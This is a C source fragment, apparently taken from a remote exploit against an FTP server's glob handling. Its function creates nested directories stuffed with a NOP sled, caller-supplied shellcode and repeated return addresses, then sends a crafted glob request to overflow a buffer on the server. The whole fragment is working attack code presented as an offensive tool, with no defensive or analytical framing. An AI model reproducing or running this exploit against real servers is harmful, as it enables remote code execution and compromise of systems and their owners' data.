
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;






typedef int dir ;


 char NOP ;
 int fprintf (int ,char*,...) ;
 int ftp_chdir (int,char*) ;
 int ftp_mkdir (int,char*) ;
 unsigned long htonl (unsigned long) ;
 int memcpy (char*,char*,size_t) ;
 int memset (char*,char,int) ;
 int printf (char*,...) ;
 char* random_string () ;
 int send_glob (int,char*) ;
 int stderr ;
 int strcpy (char*,char*) ;
 size_t strlen (char*) ;

int ftp_glob_exploit(int sock, char *homedir, unsigned long addy, char *shellcode)
{
    char dir[300];
    int i = 0, j = 0;
    int total = strlen(homedir) + 1;
    int align;
    char *rstring = random_string();


    if(!ftp_chdir(sock, homedir))
    {
 fprintf(stderr, "[-] Failed to change directory, aborting!\n");
 return 0;
    }

    for(i = 0; i < 4; i++)
    {
 memset(dir, 0x0, sizeof(dir));

 switch(i)
 {
 case 0:
     memcpy(dir, rstring, strlen(rstring));
     memset(dir + strlen(rstring), NOP, 255 - strlen(rstring));
     memcpy(&dir[(255 - strlen(shellcode))], shellcode, strlen(shellcode));
     break;

 case 3:

     align = total % sizeof(long);
     align = sizeof(long) - align;

     printf("[3] Calculated alignment = %d, total = %d\n",
     align, total);

     strcpy(dir, "XXXX");
     memset(dir + 4, 'X', align);

     for(j = 4 + align; j < 250; j += 4)
     {


  unsigned long p_addy = htonl(addy);
  dir[j + 0] = p_addy & 0xff;
  dir[j + 1] = (p_addy & 0xff00) >> 8;
  dir[j + 2] = (p_addy & 0xff0000) >> 16;
  dir[j + 3] = (p_addy & 0xff000000) >> 24;
     }
     break;

 default:
     memset(dir, 'X', 255);
     break;

 }

 total += strlen(dir) + 1;

 if(!ftp_mkdir(sock, dir))
 {
     fprintf(stderr, "[-] Failed to generate directories, aborting!\n");
     return 0;
 }

 if(!ftp_chdir(sock, dir))
 {
     fprintf(stderr, "[-] Failed to change directory, aborting!\n");
     return 0;
 }
    }

    printf("[4] Evil directories created.\n");

    if(!ftp_chdir(sock, homedir))
    {
 fprintf(stderr, "[-] Failed to cwd back to %s, aborting!\n", homedir);
 return 0;
    }


    send_glob(sock, rstring);

    return 1;
}
